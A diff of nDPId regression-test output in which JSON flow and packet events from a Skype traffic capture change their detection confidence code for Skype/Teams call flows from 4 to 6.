00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1431969678448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969678448,"pkt":"0NQSxnP1PBXCt3IOCABFAABBiiMAAEARDm3AqAEiQTffGjLdnEQALZMdnFwCzKFKSd3cA9PLS4BXWJFRrjZHyG3cJPIPdrTAqEb6jU8VDg=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1431969679026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969679026,"pkt":"0NQSxnP1PBXCt3IOCABFAABLE+cAAEAR40fAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1431969679027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969679027,"pkt":"0NQSxnP1PBXCt3IOCABFAABL8bEAAEARBX3AqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679451,"flow_last_seen":1431969679451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969679451,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431969679451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969679451,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZ+RAAEAG8MXAqAEiQTffDMORnF\/vfD8JAAAAALAC\/\/9szQAAAgQFtAEDAwUBAQgKPiMbhwAAAAAEAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zKQAAEARzHXAqAEinTeClzLdnFEAJhOjnF4CtwUXw\/VWCApVJdrfxkhI5qU9AKuGw3faL7f5"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5dCsAAEARu0zAqAEi1cezqjLdnEsAJQhSnGAC6QwwmBRocZoeU0bscPTURL89AdihxLtaI+k="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":977,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lc0AAEARZY3AqAEib91NsDLdnFQAJ2jKnGICi6AMRljZtq+Es\/pWkLbSJ\/TvDoZrPj0F5hXOgQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1431969679581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969679581,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIpxfw5E\/Sv9r73w\/CqASOJDLRwAAAgQFrAQCCApNoe2VPiMbhwEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1431969679581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969679581,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0cmZAAEAG5k\/AqAEiQTffDMORnF\/vfD8KP0r\/bIAQECwh8QAAAQEICj4jHAhNoe2V"} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLe\/oAAEARezTAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLZ0MAAEARj+vAqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1431969680467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969680467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5uekAAEARKTXAqAEinTc4lDLdnEoAJXlNnGQC\/A+kfzeJzZXZQQBxWhYkhXip+EvBFG8rlU4="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1431969680467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969680467,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyVhkAAEAR2gHAqAEinTfrnjLdnF8AHti+nGYCSGBvJFR\/HGq\/K9Cny1\/vxLQHiA=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681060,"flow_last_seen":1431969681060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681060,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431969681060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681060,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2fpAAEAGfq\/AqAEiQTffDMOSAbvQogCqAAAAALAC\/\/9eaAAAAgQFtAEDAwUBAQgKPiMhyQAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431969681195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIgG7w5Js9UEp0KIAq6ASOJBL6AAAAgQFrAQCCApNoe8nPiMhyQEDAwk="} @@ -583,50 +583,50 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/b9AAEAGpVbAqAEinTc4oMOTnFuhu64eAAAAALAC\/\/+OBAAAAgQFtAEDAwUBAQgKPiMjagAAAAAEAgAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4YcMAAEARzb3AqAEi1cezojLdnF0AJAuMnGgC2mPP3NT+NgZcfouOKEVgI\/tI0sJfUuMhDA=="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1+dEAAEARBS\/AqAEib91KEDLdnGAAIfCsnGoCw1fhnSu+3d\/Tw+s36JFjatVqYPGvPQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyaGwAAEARx63AqAEinTfrnzLdnFUAHmVKnGwCxXHmKlMo0hJpMwmU59yIG9tJmA=="} 